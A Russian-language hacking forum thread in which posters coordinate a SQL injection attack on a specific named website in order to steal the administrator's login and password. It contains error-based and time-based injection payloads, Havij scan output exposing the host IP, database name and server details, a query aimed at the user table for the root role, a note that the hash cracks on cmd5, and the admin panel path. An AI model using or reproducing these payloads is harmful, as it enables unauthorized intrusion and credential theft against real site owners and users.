нашел SQL инъекцию, попробовал через Havij , не отображает название столбцов баз данных.

скрин-шот: http://i.imgur.com/j2yMOWB.png

Сама инъекция:

Вопрос, что можно сделать.

http://www.securitylab.ru/news/470546.php

http://stop-obman.ru/websites.html?...r(extractvalue(1,concat(0x3a,vers ion())))=('1

руками надо

спасибо, вот только не вижу, что мы вывели данным запросом.

как вывести логин / пароль id1 т.е администратора

как не видешь

это уже сам

https://rdot.org/forum/showpost.php?p=36186&

Тут есть пример эксплуатации

http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'--

Target: http://stop-obman.ru/organizations.html?rid=1

Host IP: 217.12.206.101

Web Server: nginx

Powered-by: PHP/5.3.3

DB Server: MySQL error based

Resp. Time(avg): 889 ms

Sql Version: 5.1.73

Current DB: raferti_stopobman

Host Name: rafer685.vds

Compile OS: redhat-linux-gnu

Installation dir: /usr/

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.' at line 1. The SQL statement executed was: SELECT COUNT(DISTINCT `t`.`id`) FROM `subject` `t` LEFT OUTER JOIN `organization` `rl_orgs` ON (`rl_orgs`.`subject`=`t`.`id`) WHERE (((((type='1') AND (rl_orgs.region = '1 WAITFOR DELAY '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.enable=1))

если получится, скинь логин/пароль в лс

А сами не умеете вообще? учитесь.

http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1

пароль есть на cmd5

админка по адресу stop-obman.ru/backend будет